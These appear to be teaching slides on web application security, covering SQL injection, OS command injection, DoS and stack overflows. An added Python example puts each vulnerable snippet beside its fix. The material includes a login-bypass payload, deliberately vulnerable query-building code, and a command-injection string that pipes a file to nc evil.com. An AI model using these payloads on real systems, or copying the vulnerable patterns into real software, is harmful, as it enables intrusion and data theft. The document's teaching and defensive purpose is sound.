2. What is a web application?
- A web application or web app is any software that runs in a web browser. It is created in a browser-supported programming language (such as the combination of JavaScript, HTML and CSS) and relies on a web browser to render the application.
  http://en.wikipedia.org/wiki/Web_application
3. 1. Injection (SQL Injection)
db.ExecuteReader("select * from users where name='"
    + Request["user"] + "' and password='"
    + Request["password"] + "'");
- Suppose the user request parameter is …
  ' or '1'='1
- Then the query we execute is … (note that and has precedence over or)
  select * from users where name='' or '1'='1'
4. 1. Injection (OS Command)
- Suppose we’re too lazy to perform a DNS lookup ourselves, so we resort to the following:
system("nslookup " + Request["hostname"]);
- Suppose the hostname parameter is …
  foo || cat /etc/password | nc evil.com
- Then we end up sending the password file to evil.com
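As an added example that is not part of the slides, the two injection flaws above in Python, each beside its fix: the concatenated login query next to a parameterized one, and the nslookup call next to a version that allow-lists the hostname and passes arguments without a shell. The users table, its rows, the hostname rule and the inputs are constructed for this demo.

```python
import re
import sqlite3
import subprocess

def make_db():
    # Constructed stand-in for the slide's `users` table (sample rows, not real data).
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users (name text, password text)")
    conn.executemany("insert into users values (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    return conn

def login_vulnerable(conn, user, password):
    # Same shape as the slide's ExecuteReader call: request values are spliced
    # into the SQL text, so quotes in them change the query's structure.
    sql = ("select * from users where name='" + user
           + "' and password='" + password + "'")
    return conn.execute(sql).fetchall()

def login_safe(conn, user, password):
    # Parameterized query: the values travel separately from the SQL text and
    # are never parsed as SQL, whatever characters they contain.
    sql = "select * from users where name=? and password=?"
    return conn.execute(sql, (user, password)).fetchall()

# Allow-list for the nslookup argument: DNS labels only, nothing a shell could
# interpret. Assumed rule for this demo, not taken from the slides.
HOSTNAME_RE = re.compile(r"[A-Za-z0-9-]{1,63}(\.[A-Za-z0-9-]{1,63})*")

def is_valid_hostname(hostname):
    return len(hostname) <= 253 and HOSTNAME_RE.fullmatch(hostname) is not None

def run_lookup(hostname):
    # Replacement for system("nslookup " + hostname): reject anything that is
    # not a hostname, then pass argv as a list so no shell ever sees the input
    # and '||' or '|' are plain bytes handed to nslookup, not operators.
    if not is_valid_hostname(hostname):
        raise ValueError("rejected hostname: %r" % hostname)
    return subprocess.run(["nslookup", hostname], capture_output=True,
                          text=True, timeout=10, check=False)

if __name__ == "__main__":
    conn = make_db()
    payload = "' or '1'='1"
    print(len(login_vulnerable(conn, "nobody", payload)))  # 2: every row leaks
    print(len(login_vulnerable(conn, payload, "x")))  # 0: and binds before or
    print(len(login_safe(conn, "nobody", payload)))  # 0: value is just a string
    print(is_valid_hostname("foo || cat /etc/password | nc evil.com"))  # False
```

The second vulnerable call shows the precedence note from the slide: with the payload in the name field the query reads `name='' or ('1'='1' and password='x')`, so the bypass only works when the payload lands after the `and`.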
6. 3. DoS and DDoS
- A denial-of-service (DoS) or distributed denial-of-service (DDoS) attack is an attempt to make a machine or network resource unavailable to its intended users.
  http://en.wikipedia.org/wiki/Denial-of-service_attack
7. 4. Stack Overflow
- A stack buffer overflow or stack buffer overrun occurs when a program writes to a memory address on the program's call stack outside of the intended data structure, which is usually a fixed-length buffer.